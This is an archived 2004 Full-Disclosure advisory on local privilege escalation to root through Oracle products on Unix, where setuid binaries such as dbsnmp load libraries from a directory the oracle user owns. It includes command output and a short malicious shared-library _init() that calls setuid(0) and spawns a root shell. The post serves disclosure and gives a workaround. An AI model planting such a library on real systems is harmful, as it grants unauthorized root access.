[Full-Disclosure] OPEN3S - Local Privilege Elevation through Oracle products (Unix Platform)

From: Juan Manuel Pascual (jmpascual_at_open3s.com)
Date: 07/30/04

  • Next message: Andrew Clover: "Re: [Full-Disclosure] Cool Web Search"
    To: full-disclosure@lists.netsys.com
    Date: Fri, 30 Jul 2004 11:28:39 +0200
    
    

    *----------========== OPEN3S-2004-10-05-eng-oracle-so-libraries ==========----------
    *

    * Title:* Local Vulnerability in Oracle Products. RDBMS, IAs, etc
               *All Versions*. (10g not tested)
    * Date:* 10-05-2004
    * Platform:* Tested in Linux, Solaris & HP-UX but can be exported to others.
    * Impact:* Privilege elevation from oracle products installation owner
               (usually called oracle or ias ) to root.
    * Author:* Juan Manuel Pascual Escriba <mailto:jmpascual@open3s.com>
    * Status:* Vendor contacted details below.

    *INTRODUCTION:*

    Oracle Corporation (nasdaqNM - ORCL) is a world leading database software developer,
    claiming to develop an unbreakable software. It's products are targeted in database,
    application server and data mining market.

    *PROBLEM SUMMARY:*

    This software version
            - Oracle 8i Linux Platform
            - Oracle 9i Linux Platform
            - Oracle 8i HP-UX Platform
            - Oracle 9i Solaris Platform
            - Oracle IAS 9.0.2.0.1 with patchset v9.0.2.3
            - All versions tested in Unix platform (Universal?)

    are suitable to privilege elevation from oracle software owner ( normally oracle,ias,
    iasr2) to root.

    *DESCRIPTION*

    Oracle Libraries are installed owned by oracle in a default installation of the products
    commented above.

    [pask@dimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
    ...
    drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 lbs
    drwxr-xr-x 15 iasr2 dba 512 Jan 7 12:13 ldap
    drwxr-xr-x 3 iasr2 dba 12800 Nov 21 11:22 lib
    drwxr-xr-x 13 iasr2 dba 512 Nov 21 14:04 network
    drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 ocommon
    ...

    As you can see, the lib directory owner is iasr2, let's look for some setuid binaries

    [pask@dimoniet ora9ias_mid]$ find ./ -perm +4000
    ./bin/dbsnmp
    ./bin/nmo

    [iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/dbsnmp
    -rwsr-s--- 1 root dba 2900980 Nov 21 14:04 ./bin/dbsnmp
    [iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/nmo
    -rwsr-s--- 1 root dba 12632 Nov 21 14:04 ./bin/nmo

    And now, just could see the shared objects that the binaries depends.

    [iasr2@dimoniet ora9ias_mid]$ ldd ./bin/dbsnmp
            libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
            libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
            libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
            libthread.so.1 => /usr/lib/libthread.so.1
            libkstat.so.1 => /usr/lib/libkstat.so.1
            ....

    [iasr2@dimoniet ora9ias_mid]$ ldd ./bin/nmo
            libnsl.so.1 => /usr/lib/libnsl.so.1
            libsocket.so.1 => /usr/lib/libsocket.so.1
            libgen.so.1 => /usr/lib/libgen.so.1
            .....

    ups, it's not posible to achieve root privileges with this binary and by this way

    For iasr2 user is too easy to create a so.lib, something like

    #include
    #include

    _init() {
       printf("en el _init()\n");
       printf("Con PID=%i y EUID=%i",getpid(),getuid());
       setuid(0);
       system("/usr/bin/ksh");
       printf("Saliendo del Init()\n");
    }

            
    *IMPACT*
            
            oracle,ias,iasr2 or iasdb users with local access can gain root privileges through
            oracle installation

    *EXPLOIT*

            commented above.

    *WORKAROUND*

            chown to root lib directory and parent directory.

    *STATUS*

            Oracle Security Alerts explains in an email sent 26/07/2004 that "Oracle believes that
            only trusted users should have access to the local iasdb user account".

            I have no information about a patch or a solution from Oracle Corp.

    --------------------------------------------------
    This vulnerability was researched by:
    Juan Manuel Pascual Escriba jmpascual@open3s.com
    Barcelona - Denia - Spain http://www.open3s.com

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Andrew Clover: "Re: [Full-Disclosure] Cool Web Search"

    Relevant Pages

    • Re: Oracle Linux/Virtualization Software
      ... I am not saying Oracle is correct and I'm not ... Oracle ran many performance benchmarks comparing Oracle products ... virtualization product and also with Oracle products on non- ... Democratic debate, one candidate was grilled over reports he had seen ...
      (comp.databases.oracle.server)
    • Re: Oracle Linux/Virtualization Software
      ... I am not saying Oracle is correct and I'm not ... Oracle ran many performance benchmarks comparing Oracle products ... virtualization product and also with Oracle products on non- ... utilization with an average of three times less overhead using Oracle ...
      (comp.databases.oracle.server)
    • OPEN3S - Local Privilege Elevation through Oracle products (Unix Platform)
      ... * Title:* Local Vulnerability in Oracle Products. ... Impact:* Privilege elevation from oracle products installation owner ... As you can see, the lib directory owner is iasr2, let's look for some setuid binaries ...
      (Bugtraq)
    • Re: Local Vulnerability in dbsnmp binary
      ... Local Vulnerability in dbsnmp binary ... Oracle is investigating the potential security vulnerability as reported ...
      (Bugtraq)